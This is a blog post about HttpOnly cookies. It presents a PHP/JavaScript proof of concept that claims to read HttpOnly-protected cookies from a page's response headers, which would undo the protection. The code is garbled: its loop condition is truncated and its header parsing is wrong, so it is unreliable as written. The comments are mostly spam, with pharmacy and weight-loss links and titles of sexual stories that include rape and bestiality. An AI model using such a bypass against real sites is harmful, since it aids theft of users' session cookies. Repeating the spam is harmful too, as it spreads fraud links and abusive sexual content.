Learn about HTTP-only Cookies
If you are a webmaster and you run any sort of website that uses cookies for your users to register you will want to read this. Read this and stay tuned for my next posts if you want to learn how to make your website as safe as possible.
XSS vulnerabilities are often used by the hackers to steal the cookies of the legitimate users. A classic method is by accessing the variable "document.cookies" using some javascripts.
Starting with Internet Explorer 6 sp1, Microsoft has implemented a method that prevents this kind of attack. This method uses the parameter "HttpOnly" to set a cookie in the headers just like this :
"Set-Cookie: NumeCookie:value; expires=Wednesday, 10-Oct-07 23:12:40 GMT; HttpOnly"
The key work "HttpOnly" instructs the browser of the user to restrict the access of the cookie (document.cookie) with the client-side scripts.
I will show you a method with a script javascript that can access that hidden cookie by transmitting raw requests to the web page and reading the headers.
The following code is a PHP script that shows the difference between the 2 types of cookies and how can the HttpOnly cookies be read.
=====================
<?php
// we set a normal cookie that can be found in "document.cookie"
header("Set-Cookie: CookieNormal=valueA; expires=Wednesday, 10-Oct-08 23:12:40 GMT");
// we set a hidden cookie
header("Set-Cookie: CookieHidden=valueB; expires=Wednesday, 10-Oct-08 23:12:40 GMT; HttpOnly");
?>
<script language="Javascript" type="text/javascript">
// function that extracts the hidden cookie from headers
function unHideCookie()
{
var xhr=new XMLHttpRequest(); // creating the object
xhr.open("HEAD",document.location,true); // we set a HEAD request to the same page
xhr.send(null); //transmiting the request
xhr.onreadystatechange=function()
{
if(xhr.readyState==4)
{
if(xhr.status==200) // if we get the correct answer
{
var hidden="";
var headers=xhr.getAllResponseHeaders().split(" "); // we read all the headers and save them on each element of the i variable
for(i=0;i
{
var cookie=headers[i].substring(headers[i].indexOf(" ")+1,headers[i].indexOf(";")+1); // extracting "name=value;"
hidden=hidden+cookie+" "; // adding the extracted cookie
}
}
//using the saved cookies in the hidden variable
alert("Hidden Cookie: "+hidden);
}
}
}
}
alert("document.cookie: "+document.cookie); // displaying visible cookies
unHideCookie(); // displaying Hidden cookies
</script>
=====================
The Http-only method used to hide the cookies from the client-side scripts is used for the moment just by Internet Explorer and Mozilla but it will be implemented on other browsers as well in the near future.
6 comments:
Thank you!
pharmacy salary tech buy now tramadoltarget pharmacy zoloft
[url=http://www.bebo.com/buylevitraonline1]buy dreampharmaceuticals levitra online[/url]
amazing stuff thanx :)
Howdy,
When ever I surf on web I come to this website[url=http://www.weightrapidloss.com/lose-10-pounds-in-2-weeks-quick-weight-loss-tips].[/url]You have really contiributed very good info here arinne.blogspot.com. I am sure due to busy scedules we really do not get time to care about our health. In plain english I must warn you that, you are not serious about your health. Recent Scientific Research displays that closely 80% of all USA grownups are either chubby or overweight[url=http://www.weightrapidloss.com/lose-10-pounds-in-2-weeks-quick-weight-loss-tips].[/url] Therefore if you're one of these citizens, you're not alone. In fact, most of us need to lose a few pounds once in a while to get sexy and perfect six pack abs. Now next question is how you can achive quick weight loss? [url=http://www.weightrapidloss.com/lose-10-pounds-in-2-weeks-quick-weight-loss-tips]Quick weight loss[/url] is really not as tough as you think. Some improvement in of daily activity can help us in losing weight quickly.
About me: I am author of [url=http://www.weightrapidloss.com/lose-10-pounds-in-2-weeks-quick-weight-loss-tips]Quick weight loss tips[/url]. I am also health expert who can help you lose weight quickly. If you do not want to go under difficult training program than you may also try [url=http://www.weightrapidloss.com/acai-berry-for-quick-weight-loss]Acai Berry[/url] or [url=http://www.weightrapidloss.com/colon-cleanse-for-weight-loss]Colon Cleansing[/url] for quick weight loss.
Having searched for sites related to web hosting and furniture specifically hosting linux plans, your site was first.
Surveillance cameras show you were at the hotel inBuckhead this evening when all hell broke loose. I then told her myboss asked me to hire a detective because he knew his wife was going outon him but he didnt know with who.
xnxx stories cumming
old young taboo sex stories
brutal rape stories
celeb dog sex stories
sexy stories
Surveillance cameras show you were at the hotel inBuckhead this evening when all hell broke loose. I then told her myboss asked me to hire a detective because he knew his wife was going outon him but he didnt know with who.
Post a Comment